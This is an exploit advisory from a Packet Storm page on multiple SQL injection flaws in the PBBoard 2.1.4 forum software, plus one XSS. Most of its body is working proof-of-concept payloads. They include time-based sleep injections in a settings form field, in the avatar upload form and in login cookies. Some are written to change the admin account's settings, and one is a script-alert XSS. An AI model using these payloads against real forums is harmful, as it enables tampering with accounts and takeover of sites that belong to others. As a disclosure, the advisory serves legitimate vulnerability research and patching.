exploit the possibilities

PBBoard 2.1.4 SQL Injection

PBBoard 2.1.4 SQL Injection
Posted May 29, 2012
Authored by loneferret

PBBoard version 2.1.4 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
MD5 | a261dac4ff07c081764718b12cfb45fc

PBBoard 2.1.4 SQL Injection

Change Mirror Download
# Title: PBBoard v2.1.4 multiple SQLi Vulnerabilities
# Version: 2.1.4
# Author/Found by: loneferret
# Software Site: http://www.pbboard.com/PBBoard_v2.1.4.zip
# Other vulnerabilities: http://www.exploit-db.com/exploits/18937/

# Date found: May 29th 2012
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23

# Vulnerability:
# Due to improper sanitization, many of the parameters are injectable.
# Need a user account to trigger these.

# As always you can have fun...

PoC:

Page: Personal Options settings
Parameters: style=
lang=
hide_online=
user_time=
send_allow=
pm_emailed=
pm_window=
visitormessage=
Method: POST
POST DATA:
style=1&lang=1&hide_online=0&user_time=0&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=2' where id='2' and sleep(5)#&send=Save

By changing the 'id' number used in the 'where' clause, you can modify another user's settings.
Id=1 being admin you can, for example, change his/her timezone
POST DATA:
style=1&lang=1&
hide_online=0&user_time=+10&
send_allow=1&
pm_emailed=0&
pm_window=1&
visitormessage=2' where id='1'#&send=Save

Another thing, you can get an XSS using the MySQL's error message. Which is always funny.
POST DATA:
style=1&
lang=1&
hide_online=0
&user_time=+10&
send_allow=1&
pm_emailed=0&
pm_window=1&
visitormessage=<script>alert('xss');</script>#&send=Save


PoC #2:
Here's another example, where we get mysql to sleep for 5 seconds, as well
as change the admin's (id=1) avatar.

Page: Change avatar
Parameter: avatar_path=
Method: POST
POST DATA:
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="options"\r\n
\r\n
list\r\n
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="avatar_list"\r\n
\r\n
look/images/avatar/coof.jpg' where id='1' and sleep(5)#\r\n <--Right Here
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="avatar"\r\n
\r\n
http://\r\n
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="upload"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="change_avatar"\r\n
\r\n
Edit Settings\r\n
-----------------------------68511802421187978011060806853--\r\n

PoC #3:
SQLi in the cookie. Just need to modify the cookie value using
your favorite tool.
Parameter: PowerBB_username & PowerBB_password
PowerBB_username=loneferret' and sleep(5)#
or
PowerBB_password=e10adc3949ba59abbe56e057f20f883e' and sleep(5)#
(and if you're wondering there are 58 fields)


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close